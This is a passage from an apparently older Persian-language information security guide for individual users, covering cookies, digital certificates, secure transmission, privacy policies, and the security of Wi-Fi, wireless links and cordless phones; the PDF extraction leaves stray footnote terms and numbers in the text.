ﺑﺨﺶ ﺩﻭﻡ
cookieﻫﺎ ﻧﻪ ﺗﻨﻬﺎ ﻳﻚ ﻣﺸﻜﻞ ﺑﺮﺍﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ،
ﺑﻠﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﻣﺮﻭﺭﮔﺮﻱ ﺩﺭ ﻧﻮﺍﺭ ﺍﺑﺰﺍﺭ ﺧﻮﺩ ﻧﻤﺎﻳﻪﺍﻱ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﻛﻪ ﺑﺎ ﻛﻠﻴﻚ ﺑﺮ
ﺭﻭﻱ ﺁﻥ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﺳﺎﻧﻲ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﺭﺍ ﭘﺎﻙ ﻧﻤﻮﺩ.
٨٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺪﺭﺳﺘﻲ ﺑﻪ ﻭﻇﻴﻔﺔ ﺧﻮﺩ ﻋﻤﻞ ﻧﻤﺎﻳﺪ ﺑﺎﻳﺪ ﺑﺮﺭﺳﻲ ﻛﻨﺪ ﻓﺮﺩﻱ ﻛـﻪ
ﺩﺭﺧﻮﺍﺳﺖ ﮔﻮﺍﻫﻲ ﻧﻤﻮﺩﻩ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺧﻮﺩﺵ ﺍﺩﻋـﺎﻱ
ﺁﻧﺮﺍ ﺩﺍﺭﺩ .ﺳﭙﺲ ﺍﻳﻦ ﻣﺮﻛﺰ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺍﻣـﻀﺎ
ﻣﻲﻛﻨﺪ ﻭ ﻣﺮﻭﺭﮔﺮ ﺷﻤﺎ ﺟﺪﺍﻭﻟﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ
ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ.
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻮﻱ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﭘﻴﺎﻣﻲ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴـﺪ
ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﮔﻮﺍﻫﻲ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺁﻥ ﻣﻨﻘﻀﻲ ٩٢ﺷﺪﻩ ﻳـﺎ ﻣﺘﻌﻠـﻖ
ﺑﻪ ﻣﻜﺎﻥ ﺩﻳﮕﺮﻱ ﺍﺳﺖ .ﺣﺎﻟﺖ ﺍﻭﻝ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻋﺘﺒﺎﺭ
ﮔﻮﺍﻫﻲ ﺑﺘﺎﺯﮔﻲ ﺑﻪ ﭘﺎﻳﺎﻥ ﺭﺳﻴﺪﻩ ﻭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑـﺮﺍﻱ ﺗﻤﺪﻳـﺪ ﺁﻥ
ﺑﺎﻳﺪ ﺗﺸﺮﻳﻔﺎﺕ ﺍﺩﺍﺭﻱ ﺗﻤﺪﻳﺪ ﮔﻮﺍﻫﻲ ﺭﺍ ﺩﻧﺒﺎﻝ ﻛﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺩﻭﻡ
ﻻ ﭘﺎﻳﮕﺎﻩ ﻣﻮﺭﺩ ﻧﻈـﺮ ﺗﻐﻴﻴـﺮ ﻧـﺎﻡ ﺩﺍﺩﻩ ﻭ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺩﺭ
ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﮔﻮﺍﻫﻲ ﺁﻥ ﻣﻨﻌﻜﺲ ﻧﺸﺪﻩ ﺍﺳﺖ .ﺑـﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ ﺍﮔـﺮ ﺧﻮﺍﺳـﺘﺎﺭ
ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﺍﺯ ﺍﻳﻤﻨﻲ ﻫﺴﺘﻴﺪ ﺩﺭ ﻫﺮ ﺩﻭ ﺣﺎﻟﺖ ﺑﺎﻳﺪ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ
ﻣﺸﻜﻞ ﺑﮕﻮﻧﻪﺍﻱ ﺭﻓﻊ ﺷﻮﺩ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺧﻮﺩ ﺑﺎ ﺁﻥ ﭘﺎﻳﮕـﺎﻩ ﺧﺎﺗﻤـﻪ
ﺩﻫﻴﺪ.
ﺁﻳﺎ ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ ﻛﺎﻓﻲ ﺍﺳﺖ؟
ﻳﻚ ﻗﻔﻞ ﻛﻮﭼﻚ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻣـﻦ ﺩﺭ ﻭﺏ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﻭ
ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ ﺍﻧﺘﻘـﺎﻝ ﺗﻨﻬـﺎ
ﻣﻮﺭﺩﻱ ﻧﻴﺴﺖ ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ ﻗـﺮﺍﺭ
ﮔﻴﺮﺩ .ﺗﻨﻬﺎ ﺩﺭﺻﺪ ﻛﻤﻲ ﺍﺯ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﻳﺎ ﺳﺮﻗﺘﻬﺎﻱ ﻫﻮﻳﺖ ﺩﺭ
ﺍﺛﺮ ﺍﻧﺘﻘﺎﻝ ﻧﺎﺍﻣﻦ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﺩﺭﺻﺪ ﻋﻤﺪﺓ ﻣﺴﺎﺋﻞ ﻣـﻮﺍﺭﺩﻱ
ﻫﺴﺘﻨﺪ ﭼﻮﻥ:
•
•
•
ﻓﻘﺪﺍﻥ ﺍﺻﻮﻝ ﺍﺧﻼﻗﻲ ﺩﺭ ﺑﻌﻀﻲ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ؛
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺷﺨﺼﻲ؛
ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ.
ﺍﺳﺘﺜﻨﺎﻱ ﺍﺻﻠﻲ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ "ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳـﻴﻢ" ﺍﺳـﺖ ﻛـﻪ ﺩﺭ
ﺑﺨﺶ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
٩٣
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺍﻓﺮﺍﺩ ،ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻋﻼﻡ ﺷﺪﻩ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﺳﻴﺎﺳـﺘﻬﺎ ﻣـﺸﺨﺺ
ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭼـﻪ ﻧـﻮﻉ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﺟﻤﻊﺁﻭﺭﻱ ﻧﻤﻮﺩ ،ﺑﺎ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻪ ﻛﺎﺭﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﺎ ﻧﻤﻲﺗﻮﺍﻥ
Expired
Privacy Policy
92
93
ﺍﻧﺠﺎﻡ ﺩﺍﺩ ،ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ.
ﻛﻠﻴﺔ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺑﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﻳﺎ ﻣـﺎﻟﻲ ﺟﻤـﻊﺁﻭﺭﻱ
ﻣﻲﻛﻨﻨـﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻣﻨﺎﺳـﺐ ﻭ
ﺍﻋﻼﻡﺷﺪﻩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ.
ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳﻴﻢ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻭ
ﻻ
ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﺭﻭ ﺑــﻪ ﺍﻓــﺰﺍﻳﺶ ﺍﺳــﺖ .ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﻣﻌﻤــﻮ ﹰ
ﻛﻢﻫﺰﻳﻨﻪﺗﺮ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳـﻴﻤﻲ ﺍﺳـﺖ ،ﺩﺭ ﺍﻣـﺎﻛﻦ ﺧـﺼﻮﺻﻲ
ﺭﺍﺣﺖﺗﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﻧﺼﺐ ﻣﻲﺷﻮﺩ ﻭ ﺍﺷﻜﺎﻻﺕ ﺗﻨﻈﻴﻤﻲ ﻛﻤﺘـﺮﻱ
ﺩﺍﺭﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﺩﺍﺭﺍﻱ ﺩﻭ ﻣـﺸﻜﻞ ﺑـﺎﻟﻘﻮﻩ
ﺍﺳﺖ:
•
ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻴﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ.
•
ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻜﺎﻥ ،ﺁﺏ ﻭ ﻫﻮﺍ ،ﺯﻣﺎﻥ ﺭﻭﺯ ،ﻧﺰﺩﻳـﻚ ﺑـﻮﺩﻥ
ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﺩﻳﻮﻳﻲ ،ﺳﺮﻋﺖ ﺍﻧﺘﻘﺎﻝ ﺧﻂ ،ﻛﻴﻔﻴﺖ ﻧﺼﺐ ﻭ
ﺗﺪﺍﺧﻠﻬﺎﻱ ﻣﺨﺮﺏ ،ﺳﺮﻋﺖ ﻭ ﻛﻴﻔﻴﺖ ﺍﻧﺘﻘﺎﻝ ﻣﻤﻜﻦ ﺍﺳﺖ
ﻣﺘﻔﺎﻭﺕ ﺑﺎﺷﺪ.
ﺩﺭ ﻣﻮﺭﺩ ﺩﺳﺘﺔ ﺩﻭﻡ ﻣﺸﻜﻼﺕ ،ﻛﺎﺭ ﺯﻳﺎﺩﻱ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﺠـﺎﻡ ﺩﺍﺩ.
ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﺯ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻭ ﺍﺯ ﻫﺰﻳﻨـﻪﻫـﺎﻳﻲ
ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺑـﻲﺳـﻴﻢ ﺑﺎﻳـﺪ ﭘﺮﺩﺍﺧـﺖ
ﺷﻮﻧﺪ .ﺭﺍﻩ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺩﺯﺩﻱ ﻣﻴﺎﻥ ﺭﺍﻩ ٩٤ﻧﻴﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ
ﻣﺨﺘﻠﻒ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ )ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺷـﻬﺎﻱ
ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺿـــﻤﻴﻤﺔ ۱ﺍﺯ ﻫﻤــﻴﻦ ﺑﺨـــﺶ ﺭﺍ ﻣﻄﺎﻟﻌــﻪ ﻛﻨﻴـــﺪ( .ﺍﮔـــﺮ
ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺍﻱ ﺩﺍﺭﻳﺪ ﻛﻪ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻣﻲﻛﻨﺪ ﺣﺘﻤﹰﺎ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ )ﻣﺜﻞ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺒﺘﻨـﻲ ﺑـﺮ
.(SSLﺍﮔﺮ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ POPﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﮔﺰﻳﻨﺔ APOPﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻧﻤﺎﻳﻴـﺪ ﺗـﺎ ﺭﻣﺰﻫـﺎﻱ
ﻋﺒﻮﺭ ﻗﺒﻞ ﺍﺯ ﺍﺭﺳﺎﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ .ﺍﻳﻦ ﻭﻳﮋﮔﻲ -ﻣـﺴﺘﻘﻞ ﺍﺯ
ﺭﺳﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ -ﺍﻣﻨﻴﺖ ﭘﺎﻳﺎﻧﻪ ﺑﻪ ﭘﺎﻳﺎﻧﻪ ٩٥ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﻛﻨﺪ .ﺍﮔـﺮ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ
ﻓﻨﺎﻭﺭﻱ ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻟـﺰﻭﻡ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ ﺍﺯ
ﺍﺭﺗﺒﺎﻁ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
Interception
End-to-End Security
94
95
٨٩
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
802.11ﻳﺎ Wi-Fi
802.11ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ IEEE
ﻣﺘﺄﺳــﻔﺎﻧﻪ ﭼﻨــﺪﻳﻦ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻱ ﺩﺭ ﺍﻏﻠــﺐ ﭘﻴــﺎﺩﻩﺳــﺎﺯﻳﻬﺎﻱ
Wi-Fiﻭﺟﻮﺩ ﺩﺍﺭﺩ:
•
ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﺍﺻﻠﻲ ،ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤﻦ ﻭ ﻣﻄﻤﺌﻨﻲ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ
ﻧﺪﺍﺭﻧﺪ.
•
ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓـﺮﺩ ﺩﻳﮕـﺮﻱ
ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻳﺪ ،ﺑﺎﻳﺪ ﻧـﺎﻡ ﺷـﺒﻜﺔ ﺧـﻮﺩ ) (SSIDﺭﺍ ﺍﺯ
ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﻭ ﺁﻧﺮﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴـﺪ
ﻛﻪ ﻧﺎﻡ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴـﺮ ﻣﺠـﺎﺯ ﻗﺎﺑـﻞ ﺭﺅﻳـﺖ ﻧﺒﺎﺷـﺪ.
ﺩﺭﺻﻮﺭﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ SSIDﺭﺍ ﻣـﻲ-
ﺩﺍﻧﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﺑﺒﻴﻨﻨﺪ.
•
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺁﻥ ) (WEPﺿﻌﻴﻒ ﺍﺳﺖ ﻭ ﺑﺴﺎﺩﮔﻲ
ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﻜﺴﺘﻪ ﺷﻮﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﻏﻴﺎﺏ ﺭﻭﺷـﻬﺎﻱ
ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ
ﺍﮔﺮ ﻓﺮﺩﻱ ﻭﺍﻗﻌﹰﺎ ﺑﺨﻮﺍﻫﺪ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﺭﻣـﺰ
ﻋﺒــﻮﺭ( ﺭﺍ ﺑﺮﺭﺳــﻲ ﻛﻨــﺪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺑــﺴﻴﺎﺭ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻟﺒﺘﻪ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ
) (WPAﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻛﺎﺳــﺘﻴﻬﺎﻱ WEPﺭﺍ ﺭﻓــﻊ
ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺗﺠﻬﻴﺰﺍﺕ ﺟﺪﻳﺪﺗﺮ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺑﺎﺷـﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ Wi-Fi
ﺍﻛﻴﺪﹰﺍ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ.
ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ
ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ )ﻛـﻪ ﺗﻠﻔﻨﻬـﺎﻱ ﺩﺳـﺘﻲ ﻳـﺎ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻧﻴـﺰ ﻧﺎﻣﻴـﺪﻩ
ﻣﻲﺷﻮﻧﺪ( ﺑﻪ ﺷﻜﻞ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺻﻮﺕ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ
ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﻣـﻮﺭﺩ
Wireless LANs
Wireless Fidelity
Wired Ethernet
96
97
98
ﺧﻄﻮﻁ ﺩﻭﺭ ﺑﺮﺩ
ﻻ ﺑـﺎ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻃﻮﻻﻧﻲ ﺧﺼﻮﺻﹰﺎ ﺑﺮﺍﻱ ﻣﻨﺎﻃﻖ ﺩﻭﺭﺩﺳﺖ ﻣﻌﻤـﻮ ﹰ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑـﻲﺳـﻴﻢ ﻣﻬﻴـﺎ ﻣـﻲﺷـﻮﺩ .ﺍﻳـﻦ ﺧﻄـﻮﻁ
ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﻪ ﭼﻨﺪﻳﻦ ﻛﺎﺭﺑﺮ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ.
ﺍﮔﺮ ﺭﻭﺵ ﺍﻧﺘﻘﺎﻝ ﺑﺼﻮﺭﺕ ﻣـﺴﺘﻘﻴﻢ ﺑﺎﺷـﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺘﻨﻬـﺎﻱ
ﺑﺸﻘﺎﺑﻲ ﻳﺎ ﺁﻧﺘﻨﻬﺎﻱ ﻳﺎﮔﻲ( ﺍﺳﺘﺮﺍﻕ ﺳـﻤﻊ ﺑـﺪﻭﻥ ﺗﺠﻬﻴـﺰﺍﺕ ﺧـﺎﺹ
ﺩﺷﻮﺍﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻳﻦ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑـﺼﻮﺭﺕ ﺭﻣـﺰﻱ
ﺩﺭﺁﻳﻨﺪ.
ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺣﻠﻘﺔ ﻣﺤﻠﻲ
٩٩
ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﺩﺭ ﻣﻨــﺎﺯﻝ ﻭ ﺍﺩﺍﺭﺍﺕ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑﻜــﺎﺭ
ﻣﻲﺭﻭﺩ ﻭ ﻧﺼﺐ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺑﻲﻧﻘـﺺ ﺧﻄـﻮﻁ ﺗﻠﻔـﻦ ﺭﺍ ﻣﻴـﺴﺮ
ﻣﻲﺳﺎﺯﺩ ﻭ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺳﻴﻤﻲ ﺩﺍﺭﻧـﺪ
ﺭﺍ ﻧﺪﺍﺭﺩ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑـﺮﺧﻼﻑ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ ،ﺗﺠﻬﻴـﺰﺍﺕ
ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﻴﺎﻧـﺔ ﺭﺍﻩ ﻗﺎﺑـﻞ ﺩﺯﺩﻳـﺪﻥ ﻭ ﻓـﺮﻭﺧﺘﻦ ﻧﻴـﺴﺘﻨﺪ ،ﺍﻣـﺎ
ﻫﻤﺎﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﻤﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﻮﺩﻡ ﺑـﻪ ﺍﻳـﻦ ﺧﻄـﻮﻁ
ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺠﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺗﻲ ،ﺳـﺎﻳﺮ ﺍﻧـﻮﺍﻉ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ .ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻗﺎﺑـﻞ
ﺷﻨﻮﺩ ﺑﺎﺷـﺪ .ﺑـﺴﺘﻪ ﺑـﻪ ﻣﻮﻗﻌﻴـﺖ ﻣﺤﻠـﻲ ،ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻱ ﻭ
ﻣﻘﺮﺭﺍﺕ ﻣﺤﻠﻲ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ISPﺧـﻮﺩ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﻛـﻪ
ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﺪ.
ﺳﺎﻳﺮ ﻣﺴﺎﺋﻞ ﺍﻳﻨﺘﺮﻧﺘﻲ
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ
ﺩﺭﺻــﻮﺭﺕ ﻭﺟــﻮﺩ ﺑـﻴﺶ ﺍﺯ ﻳــﻚ ﺭﺍﻳﺎﻧــﻪ ،ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬــﺎﻱ
ﺍﺷﺘﺮﺍﻛﻲ ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻭ ﻛـﺎﺭﺑﺮﺩﻱﺗـﺮﻳﻦ ﺍﺑـﺰﺍﺭ ﻣﻮﺟـﻮﺩ ﺩﺭ
